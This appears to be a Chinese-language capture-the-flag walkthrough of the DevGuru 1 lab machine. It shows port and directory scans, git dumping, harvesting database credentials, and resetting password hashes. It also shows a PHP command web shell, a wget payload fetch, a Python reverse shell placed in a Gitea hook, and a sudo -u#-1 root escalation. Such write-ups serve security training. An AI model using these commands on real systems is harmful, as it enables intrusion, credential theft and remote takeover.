# DevGuru 1 > 靶场IP:`192.168.32.224` 扫描对外端口服务 ``` ┌──(root💀kali)-[~/Desktop] └─# nmap -p 1-65535 -sV 192.168.32.224 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-11 01:23 EDT Nmap scan report for 192.168.32.224 Host is up (0.00096s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 8585/tcp open unknown ``` 访问80端口 ![image-20220911132521914](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-a0a3fcdbd13cfab0725f7a3b3898781dab82b51e%2Fimage-20220911132521914.png?alt=media) 爆破目录 ``` ┌──(root💀kali)-[/tmp] └─# dirb http://192.168.32.224/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun Sep 11 01:25:29 2022 URL_BASE: http://192.168.32.224/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.32.224/ ---- + http://192.168.32.224/.git/HEAD (CODE:200|SIZE:23) + http://192.168.32.224/.htaccess (CODE:200|SIZE:1678) + http://192.168.32.224/0 (CODE:200|SIZE:12674) + http://192.168.32.224/about (CODE:200|SIZE:18666) + http://192.168.32.224/About (CODE:200|SIZE:18666) + http://192.168.32.224/backend (CODE:302|SIZE:414) ==> DIRECTORY: http://192.168.32.224/config/ + http://192.168.32.224/index.php (CODE:200|SIZE:12724) ==> DIRECTORY: http://192.168.32.224/modules/ ==> DIRECTORY: http://192.168.32.224/plugins/ + http://192.168.32.224/services (CODE:200|SIZE:10038) + http://192.168.32.224/Services (CODE:200|SIZE:10038) ==> DIRECTORY: http://192.168.32.224/storage/ ==> DIRECTORY: http://192.168.32.224/themes/ ==> DIRECTORY: http://192.168.32.224/vendor/ ---- Entering directory: http://192.168.32.224/config/ ---- ---- Entering directory: http://192.168.32.224/modules/ ---- ==> DIRECTORY: http://192.168.32.224/modules/backend/ ==> DIRECTORY: http://192.168.32.224/modules/cms/ ==> DIRECTORY: http://192.168.32.224/modules/system/ ``` 访问:`/.git/HEAD` ![image-20220911133800456](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-fa337f6beedc3d9ee52b0ce823a849d40fd37775%2Fimage-20220911133800456.png?alt=media) 使用[git-dumper](https://github.com/arthaud/git-dumper)对整个git项目导出 ``` ┌──(root💀kali)-[/opt/git-dumper] └─# python3 git_dumper.py http://192.168.32.224 /tmp/sources ``` ![QQ录屏20220911134103](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-c01406d1f020e71a5503a1b7bc6361caeb37be55%2FQQ%E5%BD%95%E5%B1%8F20220911134103.gif?alt=media) 访问:`/adminer.php`,发现需要数据库连接信息 ![image-20220911134719207](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-b8f40694d4eef0ecd1a87d6dc0eb5e5a7c64cfc8%2Fimage-20220911134719207.png?alt=media) 查看数据库连接文件 ``` ┌──(root💀kali)-[/tmp/sources] └─# cat config/database.php 'mysql' => [ 'driver' => 'mysql', 'engine' => 'InnoDB', 'host' => 'localhost', 'port' => 3306, 'database' => 'octoberdb', 'username' => 'october', 'password' => 'SQ66EBYx4GT3byXH', 'charset' => 'utf8mb4', 'collation' => 'utf8mb4_unicode_ci', 'prefix' => '', 'varcharmax' => 191, ], ``` 登录成功 ![image-20220911134800481](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-6d7df538e6972246a1b942848ee57f4f2fccf95d%2Fimage-20220911134800481.png?alt=media) 在 `backend_users` 表中,我在这里看到了用户"`frank`"的记录,我找到了bcrypt 算法加密形式的密码,并且可以使用编辑选项卡修改该记录。 ![image-20220911143536787](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-abcbdca6d1a1f97e70e015cb5c16ae13bd6ff40f%2Fimage-20220911143536787.png?alt=media) 因此,我尝试使用 :**hack123** ``` $2a$10$EZqGJ5vfe6K9vtzmn9xPCOER/W0JwLkLzzUFFfmvsM2CKFxr9P4tm ``` 使用`frank/hack123`登录cms ![image-20220911143914144](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-ccda3d80568661d572f93ceab53614dc4dee0d4a%2Fimage-20220911143914144.png?alt=media) ![image-20220911144025287](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-65e2e1b4ba89f69df86c3ad68fd15c8d5b81b9f1%2Fimage-20220911144049714.png?alt=media) 我在 Google 上搜索并找到了一个通过执行 PHP 代码来利用 October CMS的[链接。](https://octobercms.com/forum/post/running-php-code-on-pages)所以我执行以下代码: ``` {{ this.page.getShell }} ``` ![image-20220911144531339](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-bc42149bdc07f1ef7669a3a015d2d93b69cd6faf%2Fimage-20220911144531339.png?alt=media) 在"`home.htm`"文件的代码选项卡中添加以下方法: ```php function onStart() { $this->page['getShell'] = system($_GET['cmd']); } ``` ![image-20220911144637827](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-a4ed0aead087c10ee40c553e24cd9ec35cc2569e%2Fimage-20220911144637827.png?alt=media) 执行shell:`http://192.168.32.224/?cmd=ls -la` ![image-20220911144755272](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-6c29ec59ea33febff92cb1fd25decb40badfcc68%2Fimage-20220911144755272.png?alt=media) 下载反弹shell ``` 192.168.32.224/?cmd=wget http://192.168.32.130/shell.php ``` 我们得到了反向连接,让我们进一步列举。我们在 /var/backup 中找到了**app.ini.bak**文件 ![image-20220911145415804](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-90aacc3af66e241b0225dce6a501bba370258b4d%2Fimage-20220911145415804.png?alt=media) 在这里,我们找到了 `gitea` DB 的另一个登录凭据。 ``` [database] ; Database to use. Either "mysql", "postgres", "mssql" or "sqlite3". DB_TYPE = mysql HOST = 127.0.0.1:3306 NAME = gitea USER = gitea ; Use PASSWD = `your password` for quoting if you use special characters in the password. PASSWD = UfFPTF8C8jjxVF2m ``` 因此我们以`gitea:UfFPTF8C8jjxVF2m`登录mysql ![image-20220911145710421](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-1c33f48c29d84f01e4416c1d1f90c8c0217c3129%2Fimage-20220911145710421.png?alt=media) 在用户内部的 gitea DB 中,该表包含 `user:frank` 并再次更改密码 ![image-20220911145753626](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-131d9ff3fd84e087fcb470f8d5a47b234e453e39%2Fimage-20220911145753626.png?alt=media) 现在让我们使用上面生成的用户 Frank 的密码哈希。因此,我为用户 frank 编辑了记录并更新了表格。 ![image-20220911145901856](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-5cfd95c371b606e6a5419a7a33fc6b69562b4d9b%2Fimage-20220911145901856.png?alt=media) 然后我导航到 gitea over 8585 并使用以下凭据登录 ![image-20220911145953967](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-e01858b6042e333d4f0e1dee04210f77e37d916e%2Fimage-20220911145953967.png?alt=media) 在这里,我们得到了仪表板并找到了 `frank/devguru-website` 的链接。 ![image-20220911150029521](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-64c1c875e7311a4c9267d06c6aa6674cfbcb05e1%2Fimage-20220911150029521.png?alt=media) 单击图像中突出显示的设置。 ![image-20220911150114626](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-214c3099f679292fefcd71045712aed2fd486a22%2Fimage-20220911150114626.png?alt=media) 点击**Git Hooks > pre-receive > Hook Content**然后执行 python 反向 shell 和代码。 ``` python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.32.130",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` ![image-20220911150058942](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-f2650ee1dc7fb9d749021ba4b372afdea4c080f6%2Fimage-20220911150058942.png?alt=media) ![image-20220911150224444](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-adeb3bd2f3b680939c5e5ff976d1d7aaa5762785%2Fimage-20220911150224444.png?alt=media) 但是您需要更新存储库以执行 python 代码,因此返回存储库并打开 `README.md` 现在通过在文件末尾添加一些空白行来编辑文件,并在单击提交更改后立即单击提交更改,它将更新存储库,您将通过 netcat 会话获得反向连接。 ![QQ录屏20220911150411](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-d1b38d4c66d74e8c6ebb42c7c5c0a46ed7405467%2FQQ%E5%BD%95%E5%B1%8F20220911150411.gif?alt=media) 因此,我们得到了反向连接,我们找到了 `user.txt` 文件,这是我们的第一个标志。 ![image-20220911150559111](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-9a328c0a8ee61a80c2b1078a0cc74bdbd73c229d%2Fimage-20220911150559111.png?alt=media) 为了提升权限,我们检查了 Sudo 权限,发现用户 frank 可以使用 root 权限运行 sqlite3,而且安装的 sudoers 插件版本也存在漏洞。 ![image-20220911150637333](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-5fac465dc186a652f68cbf93796fe2fbfd1e8965%2Fimage-20220911150637333.png?alt=media) 我们从[这里](https://www.exploit-db.com/exploits/47502)发现了一个漏洞。然后我执行以下命令以获取 root 权限 shell 并读取作为我们最终标志的 root.txt。 ``` sudo -u#-1 sqlite3 /dev/null '.shell /bin/bash' ``` ![image-20230208134605514](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-6be99431f054449af312f269293c0fbabbee57ab%2Fimage-20230208134605514.png?alt=media)